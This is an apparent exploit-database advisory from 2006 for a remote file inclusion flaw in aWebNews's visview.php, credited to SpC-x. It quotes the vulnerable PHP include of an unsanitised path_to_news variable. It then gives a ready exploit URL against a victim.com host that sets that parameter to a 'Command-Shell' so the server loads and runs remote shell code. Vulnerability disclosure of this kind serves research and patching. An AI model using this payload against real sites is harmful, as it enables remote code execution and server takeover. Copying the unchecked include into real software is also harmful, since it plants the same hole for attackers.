aWebNews 1.5 - 'visview.php' Remote File Inclusion

Author: SpC-x
type: webapps
platform: php
port: 
date_added: 2006-06-12 
date_updated:  
verified: 1 
codes: OSVDB-27670 
tags: 
aliases:  
screenshot_url:  
application_url: 

Credit : SpC-x

mail : SpC-x@bsdmail.org

# SaVSaK.CoM | SpC-x - The-BeKiR |

# aWebNews 1.0 version - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : aWebNews

# Credits : SpC-x

# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# include "" . $path_to_news . "config.php";
# $db = mysql_connect($db_host,$db_user,$db_pass);

# Vulnerable :

# http://www.victim.com/aWebNews/visview.php?path_to_news=Command-Shell

# milw0rm.com [2006-06-13]